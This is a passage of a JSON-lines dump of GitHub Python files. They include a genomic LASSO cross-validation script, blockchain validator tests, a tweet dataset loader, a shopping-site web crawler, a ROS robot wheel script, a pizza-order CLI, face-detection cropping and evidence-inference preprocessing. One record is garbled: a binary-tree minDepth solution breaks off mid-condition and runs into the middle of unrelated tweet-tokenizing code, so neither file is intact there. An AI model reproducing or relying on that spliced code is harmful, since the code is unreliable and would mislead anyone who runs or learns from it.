2.**(sp.linspace(-10,10,10)) #list of alphas to test\nn_splits=10\nN = X.shape[0]\nkf = KFold(n_splits,shuffle=True,random_state=None)\nn_alphas = len(alphas)\nMSE_train = sp.zeros((n_splits,n_alphas))\nMSE_test = sp.zeros((n_splits,n_alphas))\nW_nonzero = sp.zeros((n_splits,n_alphas))\nrsquared = sp.zeros((n_splits,n_alphas))\nkf.get_n_splits(X)\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Clim_GWAS_2/Temp_Files\")\n\n#Model cross-validation to select alpha\n\nimport lmmlasso\nlasso = lmmlasso.LmmLasso(warm_start=True,fit_intercept=False,tol=0.5)\nMSE_train,MSE_test,W_nonzero, rsquared = lmmlasso.runCrossValidation(lasso,X,y,alphas,n_splits=10,K=K,verbose=True)\n\n\n# MSE_train_inter=sp.interpolate.UnivariateSpline(x=alphas, y=(MSE_train.mean(axis=0))).derivative(n=2)\n# MSE_test_inter=sp.interpolate.UnivariateSpline(x=alphas, y=(MSE_test.mean(axis=0))).derivative(n=2)\n# alphas_inter = 2.**(sp.linspace(-10,10,100))\n# idx_train = sp.argmin(MSE_train_inter(alphas_inter)) \n# idx_test = sp.argmin(MSE_test_inter(alphas_inter))\n# alpha_cv = (float(alphas_inter[idx_train])+float(alphas_inter[idx_test]))/2\n\n#selecting alpha (strength of penalization)\n\nidx_train=sp.argmin(MSE_train.mean(axis=0))\nidx_test =sp.argmin(MSE_test.mean(axis=0))\nalpha_cv = (float(alphas[idx_train])+float(alphas[idx_test]))/2\n\n\n#Model fitting with chosen alpha\n\nN = X.shape[0]\nkf = KFold(n_splits,shuffle=True,random_state=12)\n\n#Objects for storing results of 10-fold cross validation\nMSE_train_final = sp.zeros((n_splits,))\nMSE_test_final = sp.zeros((n_splits,))\nW_nonzero_final = sp.zeros((n_splits,))\nrsquared_final = sp.zeros((n_splits,)) \nkendall_final = sp.zeros((n_splits,))\n\nkf.get_n_splits(X)\nlasso.set_params(alpha=alpha_cv)\n\n#10-fold cross validation\nifold = 0 \nfor train_index,test_index in kf.split(X):\n print(('running fold %d'%ifold)) \n X_train, X_test, y_train, y_test= X[train_index], X[test_index], y[train_index], y[test_index]\n K_train = K[train_index][:,train_index]\n K_test = K[test_index][:,train_index]\n model_fit=lasso.fit(X_train,y_train,K=K_train) \n ytrain_star=model_fit.predict(X_train,K_train)\n ytest_star=model_fit.predict(X_test,K_test)\n MSE_train_final[ifold]=mean_squared_error(ytrain_star,y_train)\n MSE_test_final[ifold]=mean_squared_error(ytest_star,y_test)\n W_nonzero_final[ifold]=sp.sum(model_fit.coef_!=0)\n slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_test, ytest_star)\n rsquared_final[ifold]=r_value**2\n kendall_final[ifold]=sp.stats.kendalltau(y_test,ytest_star)[0]\n ifold +=1\n\nfor train_index,test_index in kf12.split(X):\n\tX_train, X_test, y_train, y_test, plantings_train, plantings_test= X[train_index], X[test_index], y[train_index], y[test_index], plantings[train_index], plantings[test_index] #Split into training and testing data sets\n\tK_train = K[train_index][:,train_index]\n\tK_test = K[test_index][:,train_index]\n\n#Fitting a final model for making figures\n\nlasso.set_params(alpha=alpha_cv)\nlasso = lasso.fit(X_train,y_train,K=K_train)\nweights = lasso.coef_\nY_hat = lasso.predict(X_test, K_test)\npd_Yhat=pd.DataFrame(Y_hat)\npd_Yhat.reset_index(drop=True,inplace=True)\npd_ytest=pd.DataFrame(y_test)\npd_plantings=pd.DataFrame(plantings_test)\nfor_plotting=pd.concat([pd_plantings,pd_ytest,pd_Yhat],axis=1)\nfor_plotting.columns=(\"Planting\",\"Y_test\",\"Y_hat\")\n\nHalleFall2006=for_plotting.loc[for_plotting['Planting']==\"HalleFall2006\"]\nNorwichSummer2006=for_plotting.loc[for_plotting['Planting']==\"NorwichSummer2006\"]\nNorwichSummer2007=for_plotting.loc[for_plotting['Planting']==\"NorwichSummer2007\"]\nNorwichSpring2007=for_plotting.loc[for_plotting['Planting']==\"NorwichSpring2007\"]\nNorwichFall2006=for_plotting.loc[for_plotting['Planting']==\"NorwichFall2006\"]\nOuluFall2007=for_plotting.loc[for_plotting['Planting']==\"OuluFall2007\"]\nValenciaFall2006=for_plotting.loc[for_plotting['Planting']==\"ValenciaFall2006\"]\n\n############### Plot for initial visualization of results ##################################\n# import matplotlib.pyplot as plt\n# os.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/LMMLASSO/Figures_Corrected\")\n# matplotlib.use('agg')\n# plt.figure()\n\n\n# ranges=range(int(np.amax(y_test)))\n# plt.plot(ranges,ranges)\n# v=str(alpha_cv)\n\n# #plot_title=['LMMLASSO, w/SNPs, KNEWER_BIGK, Daily0_0'] #change title as needed \n# #plot_title=\"\".join(plot_title)\n# #plt.title(plot_title)\n# plt.xlabel('Observed DTB')\n# plt.ylabel('Predicted DTB')\n# plt.plot(HalleFall2006.iloc[:,1],HalleFall2006.iloc[:,2],color='#8f0000',marker='o',linestyle='None',label='HalleFall2006')\n# plt.plot(NorwichSummer2006.iloc[:,1],NorwichSummer2006.iloc[:,2],color='#c54259',marker='X',linestyle='None',label='NorwichSummer2006')\n# plt.plot(NorwichSummer2007.iloc[:,1],NorwichSummer2007.iloc[:,2],color='#e881ab',marker='p',linestyle='None',label='NorwichSummer2007')\n# plt.plot(NorwichSpring2007.iloc[:,1],NorwichSpring2007.iloc[:,2],color='#ffc2f3',marker='v',linestyle='None',label='NorwichSpring2007')\n# plt.plot(NorwichFall2006.iloc[:,1],NorwichFall2006.iloc[:,2],color='#d890e7',marker='d',linestyle='None',label='NorwichFall2006')\n# plt.plot(OuluFall2007.iloc[:,1],OuluFall2007.iloc[:,2],color='#9f66e1',marker='P',linestyle='None',label='OuluFall2007')\n# plt.plot(ValenciaFall2006.iloc[:,1],ValenciaFall2006.iloc[:,2],color='#3a47de',marker='*',linestyle='None',label='ValenciaFall2006')\n# #plt.figtext(0,2,rmse_string)\n# #plt.figtext(0,1.5,r2_string)\n# plt.legend(loc='upper left',frameon=True,fontsize='small')\n# plt.savefig('PredvsObs_KLIMIX_minmax.png')\n\n\n############################################################################\n\n#Record results\n\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/LMMLASSO/Summary_Results_Corrected\")\n\n\nalpha_cv_np=np.array(alpha_cv)\nc=np.array(sum(weights!=0))\nW_nonzero=np.array(c)\nrmse_test=math.sqrt(np.mean(MSE_test_final))\nr2_model=np.mean(rsquared_final)\nkendall_model=np.mean(kendall_final)\n\n\nresults=np.array((alpha_cv_np,W_nonzero,rmse_test,r2_model,kendall_model))\nresultspd=pd.DataFrame(results)\nresultspd=resultspd.T\nresultspd.columns=(\"alpha\",\"W_nonzero\",\"rmse_test\",\"R2\",\"kendalltau\")\nresultspd.to_csv(\"Results_KLIMIX_minmax.csv\")","repo_name":"andhikarp/AraCast","sub_path":"Scripts/LMMLASSO_testGSM.py","file_name":"LMMLASSO_testGSM.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35817837585","text":"import pytest\n\nfrom plenum.common.messages.fields import RequestIdentifierField\nfrom plenum.test.input_validation.constants import \\\n TEST_IDENTIFIER_SHORT, TEST_IDENTIFIER_LONG\n\nfrom plenum.test.input_validation.utils import b58_by_len\n\nvalidator = RequestIdentifierField()\n\n# Request id consists of client identifier (base56 string 16/32 long) and\n# some number (for now it is current timestamp, but can be any number)\nvalid_request_id = (TEST_IDENTIFIER_LONG, 11111)\n\n\ndef test_valid_request_id():\n for byte_len in range(1, 33):\n val = b58_by_len(byte_len)\n if byte_len in (16, 32):\n assert not validator.validate((val, 11111))\n else:\n assert validator.validate(val)\n\n\ndef test_invalid_order():\n s, t = valid_request_id\n assert validator.validate((t, s))\n\n\ndef test_empty_client_id():\n assert validator.validate((\"\", valid_request_id[1]))\n assert validator.validate((None, valid_request_id[1]))\n\n\ndef test_empty_number():\n assert validator.validate((valid_request_id[0], None))\n\n\ndef test_invalid_char():\n invalid_client_id = valid_request_id[0][:-1] + \"0\"\n invalid_request = (invalid_client_id, valid_request_id[1])\n assert validator.validate(invalid_request)\n\n\ndef test_invalid_length():\n invalid_client_id = valid_request_id[:-1]\n invalid_request = (invalid_client_id, valid_request_id[1])\n assert validator.validate(invalid_request)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/input_validation/fields_validation/test_request_identifier_field.py","file_name":"test_request_identifier_field.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"}
+{"seq_id":"9943209090","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minDepth(self, root: Optional[TreeNode]) -> int:\n if not root:return 0 \n d ={root:1}\n Q=[root]\n mindepth = float(\"inf\")\n while Q:\n l = len(Q)\n for _ in range(l):\n node = Q.pop(0) \n if not(node.left or node.right) and d[node]= offset_start) and (char_start <= offset_end):\n token_start = token_index\n if (char_end-1 >= offset_start) and (char_end <= offset_end):\n token_end = token_index\n \n assert token_start is not None\n assert token_end is not None\n \n token_start += 4\n token_end += 4\n \n return (\n ids,\n attention_mask,\n token_type_ids,\n token_start,\n token_end,\n tweet,\n selected_text\n )\n\nclass TweetData(Dataset):\n def __init__(self, dataframe, tokenizer, max_len):\n self.dataframe = dataframe\n self.tokenizer = tokenizer\n self.max_len = max_len\n \n def __len__(self):\n return len(self.dataframe.index)\n\n def __getitem__(self, item):\n row = self.dataframe.loc[item]\n\n tweet = row.text\n selected_text = row.selected_text\n sentiment = row.sentiment\n textID = row.textID\n\n (\n ids,\n attention_mask,\n token_type_ids,\n token_start,\n token_end,\n tweet,\n selected_text\n ) = process_tweet(tweet, selected_text, sentiment, self.tokenizer, self.max_len)\n\n return {\n \"ids\": torch.tensor(ids, dtype=torch.long),\n \"attention_mask\": torch.tensor(attention_mask, dtype=torch.long),\n \"token_type_ids\": torch.tensor(token_type_ids, dtype=torch.long),\n \"token_start\": torch.tensor(token_start, dtype=torch.long),\n \"token_end\": torch.tensor(token_end, dtype=torch.long),\n \"tweet\": tweet,\n \"selected_text\": selected_text,\n \"sentiment\": sentiment,\n \"textID\": textID\n }\n\ndef kfold_indices(dataframe, n_splits=5):\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=2)\n splits = []\n for split in kfold.split(np.arange(dataframe.index.size), y=dataframe.sentiment):\n splits += [split]\n\n return splits\n\nif __name__ == \"__main__\":\n train, test, _ = read_data()\n\n tokenizer = initialize_tokenizer(Config.roberta_vocab, Config.roberta_merges)\n train_dataset = TweetData(train, tokenizer, Config.max_len)\n\n for batch in DataLoader(train_dataset, batch_size=100):\n print(batch[\"ids\"])\n print(batch[\"attention_mask\"])\n print(batch[\"token_type_ids\"])\n break","repo_name":"meetashok/kaggle","sub_path":"tweet-sentiment-extraction/roberta/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"69869013852","text":"# 참고 사이트\n# https://beomi.github.io/2017/07/05/HowToMakeWebCrawler-with-Multiprocess/\n\nfrom urllib import request\nimport requests\nimport csv\nimport ssl\nfrom bs4 import BeautifulSoup as bs\n# import selenium\n# from selenium import webdriver\n# from selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.chrome.options import Options\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.common.by import By\n# from selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom multiprocessing import Pool\nfrom csv import writer\nimport random\nimport os\n\n# 크롤링에서 사용하는 변수들\nheaders = { 'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36'}\nbaseUrl = \"https://goods.musinsa.com/api/goods/v1/review/style/list\";\npage = 1\n# 상품리뷰 없는거\n# goodsNo = 1911367\n# goodsNo = 2043036\ngoodsNo = 1576682\nlist_data = []\n\ndef writeCSV(list):\n list_title = ['codiId', 'codiStyle', 'codiTitle', 'codiContents', 'date', 'viewCnt', 'imgSrc', 'hashtags', 'clothes']\n if os.path.isfile(\"musinsa_codi.csv\"):\n pass\n else:\n with open('musinsa_codi.csv', 'w', newline='', encoding='utf-8-sig') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(list_title)\n f_object.close()\n\n with open('musinsa_codi.csv', 'a', newline='', encoding='utf-8-sig') as f_object:\n writer_object = writer(f_object)\n for data in list:\n writer_object.writerow(data)\n f_object.close()\n\n\ndef get_link():\n global headers\n codiStyle = ['americancasual', 'casual', 'chic', 'dandy', 'formal', 'girlish', 'golf', 'retro', 'romantic', 'sports', 'street']\n link = []\n for codi in codiStyle:\n pageNo = 1\n url = f'https://www.musinsa.com/app/codimap/lists?style_type={codi}&tag_no=&brand=&display_cnt=100&list_kind=big&sort=date&page={pageNo}'\n req = requests.get(url, headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n if soup.find('span', class_=\"totalPagingNum\"):\n totalpageNo = soup.find('span', class_=\"totalPagingNum\").text\n totalpageNo = int(totalpageNo)\n while True:\n if pageNo == totalpageNo:\n link.append(url)\n break\n else:\n link.append(url)\n pageNo += 1\n url = f'https://www.musinsa.com/app/codimap/lists?style_type={codi}&tag_no=&brand=&display_cnt=100&list_kind=big&sort=date&page={pageNo}'\n else:\n break\n print('link끝')\n return link\n\ndef get_content(url):\n global headers\n time.sleep(random.uniform(2, 3))\n codiStyle = url.split('&')[0].split('?')[1][11:]\n total_data = []\n response = requests.get(url, headers=headers)\n html = response.text\n soup = bs(html, 'html.parser')\n totalUl = soup.find('ul', class_=\"style-list\")\n totalCodi = totalUl.find_all(\"li\", class_=\"style-list-item\")\n for codiSoup in totalCodi:\n try:\n data = []\n codiOnclick = codiSoup.find('a', class_=\"style-list-item__link\").attrs['onclick']\n codiId = ''\n for i in range(8, len(codiOnclick)):\n if codiOnclick[i].isnumeric():\n codiId += codiOnclick[i]\n else:\n break\n codiTitle = codiSoup.find('a', class_=\"style-list-item__link\").attrs['title']\n date = '20'+codiSoup.find_all('span', class_=\"post-information__text\")[0].text\n viewCnt = codiSoup.find_all('span', class_=\"post-information__text\")[1].text.split()[1]\n # imgSrc = codiSoup.find('img')['data-original']\n\n newUrl = f'https://www.musinsa.com/app/codimap/views/{codiId}'\n newReq = requests.get(newUrl, headers=headers)\n newhtml = newReq.text\n time.sleep(random.uniform(1, 2))\n newSoup = bs(newhtml, 'html.parser')\n hashtags = []\n if newSoup.select_one(\"#style_info > div.styling_tag > div\"):\n hashtag = newSoup.select_one(\"#style_info > div.styling_tag > div\").contents\n # print(hashtag)\n for i in range(1, len(hashtag)):\n if hashtag[i].text != '\\n':\n hashtags.append(hashtag[i].text[1:])\n else:\n hashtags = []\n imgSrc = newSoup.find('img',class_=\"photo\")['src']\n codiContents = newSoup.select_one(\"#style_info > div.styling_tag > p\").text\n # 하위 items \n clothesInfo = newSoup.find_all(\"div\", class_=\"swiper-slide\")\n clothes = []\n for cloth in clothesInfo:\n clothesBrand = cloth.find(\"a\", class_=\"brand\").text\n clothesName = cloth.find(\"a\", class_=\"brand_item\").text\n clothesImg = cloth.find(\"img\")['src']\n # if cloth.find\n clothesId = clothesImg.split('/')[6]\n clothesPrice = cloth.find(\"div\", class_=\"price\").contents[0].strip('\\n').strip('\\t')\n clothesPrice = clothesPrice.replace(\",\", \"\")\n clothes.append([clothesId, clothesBrand, clothesName, clothesImg, clothesPrice])\n data = [codiId, codiStyle, codiTitle, codiContents, date, viewCnt, imgSrc, hashtags, clothes]\n total_data.append(data)\n except:\n # html 못찾음\n pass\n writeCSV(total_data)\n\n\nif __name__=='__main__':\n start_time = time.time()\n pool = Pool(processes=16) # 8개의 프로세스를 사용합니다.\n pool.map(get_content, get_link()) # 2~3초 소요 500개 기준\n # speed_get_content(get_links()) # 단일 프로세스 12~14초 소요 500여개 기준\n print(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"yoonjung1205/SSAFit","sub_path":"data/DataCrawling/정윤정/crawling_codi.py","file_name":"crawling_codi.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2385589439","text":"#! /usr/bin/env python\nimport rospy\nfrom silbot3_msgs.msg import Device_Wheel_Msg\n\ndef move_wheel():\n publisher = rospy.Publisher('/DeviceNode/Wheel/commands', Device_Wheel_Msg, queue_size=10)\n wait_wheel_prepared(publisher)\n msg = Device_Wheel_Msg()\n msg.command = \"WHEEL_MOVE_TO_DELTA_X\"\n\n deltaX = -1000\n velocity = 50\n\n msg.iParams.append(deltaX)\n msg.dParams.append(velocity)\n publisher.publish(msg)\n\ndef wait_wheel_prepared(publisher) :\n r = rospy.Rate(10)\n subscriber_count = publisher.get_num_connections()\n while subscriber_count < 1 :\n subscriber_count = publisher.get_num_connections()\n rospy.loginfo(\"wating for subscriber\")\n r.sleep()\n\nif __name__ == \"__main__\" :\n rospy.init_node(\"wheel_move_delta_python\", anonymous=False)\n move_wheel()\n rospy.spin()\n","repo_name":"Robocare-lab/silbot3_tutorials","sub_path":"scripts/device/move_wheel_delta.py","file_name":"move_wheel_delta.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42269953305","text":"matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\npar = 0\nfor a in range(0, 3):\n for c in range(0, 3):\n matriz[a][c] = int(input(f'Digite o valor [{a}], [{c}]: '))\nprint(f'[{matriz [0][0]:^5}] [{matriz[0][1]:^5}] [{matriz[0][2]:^5}]')\nprint(f'[{matriz [1][0]:^5}] [{matriz[1][1]:^5}] [{matriz[1][2]:^5}]')\nprint(f'[{matriz [2][0]:^5}] [{matriz[2][1]:^5}] [{matriz[2][2]:^5}]')\nfor c, v in enumerate(matriz[0]):\n if v % 2 == 0:\n par += v\nfor c, v in enumerate(matriz[1]):\n if v % 2 == 0:\n par += v\nfor c, v in enumerate(matriz[2]):\n if v % 2 == 0:\n par += v\nsoma = matriz[0][1] + matriz[1][1] + matriz[2][1]\nmaior = 0\nfor c, v in enumerate(matriz[1]):\n if v > maior:\n maior = v\nprint(f'A soma dos valores pares é: {par}')\nprint(f'A soma dos valores da segunda coluna é igual a: {soma}')\nprint(f'O maior valor encontrado na seguna linha é {maior}')\n\n","repo_name":"DevFerraz/Aulas-de-Python","sub_path":"Aulas/aula18.3.py","file_name":"aula18.3.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35590637576","text":"from collections import defaultdict\nfrom time import time\nfrom datetime import datetime\nfrom glob import glob\nimport os\nimport re\n\n\ncurrent_order = defaultdict(int)\norder_filenames = []\nlist_called = False\nis_saved = True\ndiscard_enabled = False\nfinish_prompted = False\nis_finished = False\n\n\ndef pizza():\n full_command = input('Enter command>')\n command = full_command.split(' ')[0]\n COMMANDS = {'take': take, 'status': status, 'save': save,\n 'list': list_orders, 'load': load, 'finish': finish}\n if command in COMMANDS:\n COMMANDS[command](full_command)\n else:\n print('Unknown command!\\n'\n 'Try one of the following:\\n'\n 'take \\n'\n 'status\\n'\n 'save\\n'\n 'list\\n'\n 'load \\n'\n 'finish')\n global is_finished\n if not is_finished:\n pizza()\n\n\ndef take(command):\n command = command.split(' ')\n client_name = command[1]\n price = float(command[2])\n current_order[client_name] += price\n global is_saved\n is_saved = False\n print('Taking order from {0} for {1:.2f}'.format(client_name, price))\n global list_called\n list_called = False\n\n\ndef status(command):\n for client in current_order:\n print(client + ' - ' + str(current_order[client]))\n global list_called\n list_called = False\n\n\ndef save(command):\n ts = time()\n filename = 'orders_' + \\\n datetime.fromtimestamp(ts).strftime('%Y_%m_%d_%H_%M_%S')\n order_file = open(filename + '.txt', 'a')\n for client in current_order:\n order_file.write(client + ' - ' + str(current_order[client]) + '\\n')\n print('Saved the current order to ' + filename)\n order_file.close()\n global is_saved\n is_saved = True\n global list_called\n list_called = False\n\n\ndef list_orders(command):\n full_order_filenames = glob('*.txt')\n global order_filenames\n order_filenames = [\n os.path.splitext(filename)[0] for filename in full_order_filenames]\n for i, filename in enumerate(order_filenames):\n print('[' + str(i + 1) + '] - ' + filename)\n global list_called\n list_called = True\n\n\ndef load(command):\n global discard_enabled\n if not list_called:\n print('Use list command before loading.')\n return\n if not is_saved and not discard_enabled:\n print('You have not saved the current order.\\n'\n 'If you wish to discard it, type load again.')\n discard_enabled = True\n return\n command = command.split(' ')\n load_file_num = int(command[1])\n print('Loading ' + order_filenames[load_file_num - 1])\n load_file = open(order_filenames[load_file_num - 1] + '.txt', 'r')\n lines = load_file.readlines()\n global current_order\n current_order = defaultdict(int)\n for line in lines:\n client_order = re.findall('[\\w.]+', line)\n current_order[client_order[0]] = float(client_order[1])\n load_file.close()\n discard_enabled = False\n global list_called\n list_called = False\n\n\ndef finish(command):\n global finish_prompted\n if not is_saved and not finish_prompted:\n print('You have not saved your order.\\n'\n 'If you wish to continue, type finish again.\\n'\n 'If you want to save your order, type save')\n finish_prompted = True\n return\n print('Finishing order. Goodbye!')\n global is_finished\n is_finished = True\n global list_called\n list_called = False\n\n\ndef main():\n pizza()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stoyaneft/HackBulgariaProgramming-101","sub_path":"week0/3.Python-file-system-problems/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15617890607","text":"import cv2\r\nimport numpy as np\r\nimport math\r\nimport argparse\r\nfrom PIL import Image\r\nfrom yolo import YOLOv8_face\r\n\r\nclass FaceDetector:\r\n def __init__(self, modelpath, confThreshold=0.45, nmsThreshold=0.5) -> None:\r\n self.model = YOLOv8_face(modelpath, conf_thres=confThreshold, iou_thres=nmsThreshold)\r\n\r\n def face_detect(self, imgpath):\r\n img = cv2.imread(imgpath)\r\n\r\n boxes, scores, classids, kpts = self.model.detect(img)\r\n\r\n pad = 10\r\n crops = []\r\n for bbox in boxes:\r\n x, y, w, h = bbox\r\n x, y, w, h = int(x), int(y), int(w), int(h)\r\n if x<0 or y<0 or w<=0 or h<=0 or x+w>img.shape[1] or y+h>img.shape[0]:\r\n print(\"problem\")\r\n continue\r\n \r\n new_x = x - pad\r\n if new_x<0:\r\n new_x = 0\r\n pad_x = x-new_x\r\n new_y = y - pad\r\n if new_y<0:\r\n new_y = 0\r\n pad_y = y-new_y\r\n new_w = w+pad_x+pad\r\n new_h = h+pad_y+pad\r\n if new_x+new_w>img.shape[1]:\r\n new_w = img.shape[1]-new_x\r\n if new_y+new_h>img.shape[0]:\r\n new_h = img.shape[0]-new_y\r\n \r\n crop = img[new_y:new_y + new_h, new_x:new_x + new_w]\r\n pil_image = Image.fromarray(crop)\r\n\r\n crops.append(pil_image)\r\n \r\n return crops","repo_name":"oavioz/GenerativeAI-Custom-Detection","sub_path":"src/face_recognition/face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27798673111","text":"from collections import OrderedDict, namedtuple\nfrom typing import List\nimport logging\nimport os \n\nimport pandas as pd \nimport numpy as np\nnp.random.seed(896)\n\nfrom os.path import join, dirname, abspath\nimport sys\n\n# this monstrosity produces the module directory in an environment where this is unpacked\nsys.path.insert(0, abspath(join(dirname(abspath(__file__)), '..', '..')))\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom evidence_inference.preprocess.sentence_split import find_span_location, split_into_sentences, gen_exact_evid_array\nfrom evidence_inference.preprocess.article_reader import TableHTMLParser\nimport evidence_inference.preprocess.article_reader as article_reader\nlogging.basicConfig(level=logging.DEBUG, format='%(relativeCreated)6d %(threadName)s %(message)s')\nlogger = logging.getLogger(__name__)\nparser = TableHTMLParser()\n\n# this monstrosity points us to a root directory relative to this file\nannotation_root = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\", \"annotations\"))\nanno_csv_path = os.path.join(annotation_root, \"annotations_merged.csv\") # \"pilot_run_data/annotations.csv\"\nprompts_csv_path = os.path.join(annotation_root, \"prompts_merged.csv\") # \"pilot_run_data/prompts.csv\"\nbase_XML_path = os.path.join(annotation_root, \"xml_files\")\nbase_TXT_path = os.path.join(annotation_root, \"txt_files\")\nbase_ABS_path = os.path.join(annotation_root, \"abstracts\")\n_train_id_file, _validation_id_file, _test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['train_article_ids.txt', 'validation_article_ids.txt', 'test_article_ids.txt']]\n_ev1_train_id_file, _ev1_validation_id_file, _ev1_test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['ev1_train_article_ids.txt', 'ev1_validation_article_ids.txt', 'ev1_test_article_ids.txt']]\n_ev2_train_id_file, _ev2_validation_id_file, _ev2_test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['ev2_train_article_ids.txt', 'ev2_validation_article_ids.txt', 'ev2_test_article_ids.txt']]\nall_files = set([_train_id_file, _validation_id_file, _test_id_file, _ev1_train_id_file, _ev1_validation_id_file, _ev1_test_id_file, _ev2_train_id_file, _ev2_validation_id_file, _ev2_test_id_file])\n\nif not all(os.path.exists(x) for x in [anno_csv_path, prompts_csv_path, base_XML_path]):\n raise RuntimeError(\"One of {} does not exist\".format([anno_csv_path, prompts_csv_path, base_XML_path]))\n\n# base_XML_path = os.path.join(\"pilot_run_data\", \"xml_files\")\n\nPROMPT_ID_COL_NAME = \"PromptID\"\nLBL_COL_NAME = \"Label Code\"\nLABEL = 'Label'\nEVIDENCE_COL_NAME = \"Annotations\"\nEVIDENCE_START = \"Evidence Start\"\nEVIDENCE_END = \"Evidence End\"\nSTUDY_ID_COL = \"PMCID\"\nVALID_LABEL = \"Valid Label\"\nVALID_REASONING = \"Valid Reasoning\"\nUSE_PLAIN_TEXT = False\n\ndef get_article(article_id):\n xml_str = \"PMC{}.nxml\".format(article_id)\n xml_path = os.path.join(base_XML_path, xml_str)\n return article_reader.Article(xml_path, use_plain_text = USE_PLAIN_TEXT)\n\ndef read_in_articles(article_ids=None):\n\n anno_df = pd.read_csv(anno_csv_path)\n unique_article_ids = anno_df[STUDY_ID_COL].unique()\n\n articles = []\n\n for article_id in unique_article_ids:\n #import pdb; pdb.set_trace()\n\n if article_ids is None or article_id in article_ids:\n # 2376383\n articles.append(get_article(article_id))\n\n return articles\n\ndef get_text_article_(article_id, abstract=False):\n if abstract:\n name = f'PMC{article_id}.abst'\n base = base_ABS_path\n ext = 'abst'\n else:\n name = f'PMC{article_id}.txt'\n base = base_TXT_path\n ext = 'txt'\n text = get_text_article(article_id, base=base, ext=ext)\n if text is None:\n return None\n return article_reader.TextArticle(name=name, text=text, article_id=article_id)\n\ndef get_text_article(article_id, base=base_TXT_path, ext='txt') -> str:\n name = f'PMC{article_id}.{ext}'\n txt_path = os.path.join(base, name)\n if not os.path.exists(txt_path):\n logging.warn(f'Article {article_id} not found at {txt_path}')\n return None\n with open(txt_path, 'r') as inf:\n return inf.read()\n\ndef read_in_text_articles(article_ids=None, abstracts=False) -> List[str]:\n anno_df = pd.read_csv(anno_csv_path)\n if abstracts:\n anno_df = anno_df[anno_df['In Abstract']]\n unique_article_ids = anno_df[STUDY_ID_COL].unique()\n\n articles = []\n for article_id in unique_article_ids:\n if article_ids is None or article_id in article_ids:\n text_article = get_text_article_(article_id, abstract=abstracts)\n if text_article is not None:\n articles.append(text_article)\n #articles.append((article_id, get_text_article(article_id)))\n\n return articles\n\ndef extract_raw_text(article, sections_of_interest=None):\n if sections_of_interest is None:\n #sections_of_interest = [\"results\", \"\"]\n sections_of_interest = article.article_dict.keys()\n\n article_sections = [sec for sec in article.article_dict.keys() if any(\n [s in sec for s in sections_of_interest])]\n article_body = article.to_raw_str(fields=article_sections)\n \n if sections_of_interest is None \\\n or 'TITLE' in sections_of_interest \\\n or 'title' in sections_of_interest:\n ti_ab = \"TITLE: \" + article.get_title() + \"\\n\\n\"\n raw_text = ti_ab + \" \" + article_body\n else:\n raw_text = article_body\n \n return raw_text.replace(\"\", \"\")\n\n\ndef extract_text_from_prompts(prompts_df):\n I, C, O = prompts_df['Intervention'].values, prompts_df['Comparator'].values, prompts_df['Outcome'].values\n all_prompt_text = [s.lower() for s in np.concatenate([I, C, O])]\n return all_prompt_text\n\n\ndef get_inference_vectorizer(article_ids=None, sections_of_interest=None, vocabulary_file=None):\n\n # if article_ids is None, will use all articles\n # in the CSV passed to the read_in_articles method.\n articles = read_in_articles(article_ids=article_ids)\n raw_texts = [extract_raw_text(article, sections_of_interest) for article in articles]\n\n # we also use the prompts text to construct our vectorizer\n prompts = read_prompts()\n raw_prompt_text = \" \".join(extract_text_from_prompts(prompts))\n\n raw_texts.append(raw_prompt_text)\n\n # there is at least one prompt with tokens short enough that CountVectorizer's default destroys it, so we allow any single character through.\n if vocabulary_file is not None:\n with open(vocabulary_file, 'r') as vf:\n vocab = [line.strip() for line in vf]\n vectorizer = CountVectorizer(vocabulary=vocab, token_pattern=r\"\\b\\w+\\b\")\n print(\"Loaded {} words from vocab file {}\".format(len(vocab), vocabulary_file))\n else:\n vectorizer = CountVectorizer(max_features=20000, token_pattern=r\"\\b\\w+\\b\")\n vectorizer.fit(raw_texts)\n tokenizer = vectorizer.build_tokenizer() 